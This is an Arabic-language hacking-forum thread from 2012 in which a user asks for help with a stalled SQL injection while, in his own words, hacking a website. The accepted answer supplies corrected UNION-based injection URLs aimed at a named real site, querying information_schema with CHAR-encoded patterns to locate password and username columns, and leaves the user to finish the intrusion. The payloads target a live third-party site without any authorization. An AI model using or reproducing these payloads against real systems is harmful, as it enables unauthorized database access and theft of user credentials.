التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-18-2012, 01:32 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Senor os
زائـــر
 
الصورة الرمزية Senor os
 

 

 
إحصائية العضو




 

 

................ مجاب: مساعدة بخصوص حقن موقع


السلام عليكم المرجو المساعدة : كنت اقوم باختراق موقع لكن عندما وصلت الى where+column_name+LIKE+%pas% لا يظهر لي اي شيء ، ما الحل ؟؟؟




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC lshu]m fow,w prk l,ru

   

أفضل جواب - كتبه googles
ممم المشكل سهل جدا لديك خطأ في الامر :
هذا هو الامر الذي وضعت :
كود PHP:
www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(371129711511537)-- 
أنظر هذا هو الامر الصحيح :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- 
اضغط هنا لرؤية الصورة
كما ترى لم يجد أي جدول أو أي عمود يحتوي على كلمة pass المشفرة بــ char

ولاكن يمكنك تشفير %user% بـ char لترى هل هناك نتيجة أم لا
طيب أنا قمت بتشفير %user%
هذا هو الامر :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 117, 115, 101, 114, 37)-- 
وهذه صورة توضيحية لنتيجة
اظغط هنا لرؤية الصورة

أترك لك البقية
تحياتي .
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 01:59 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0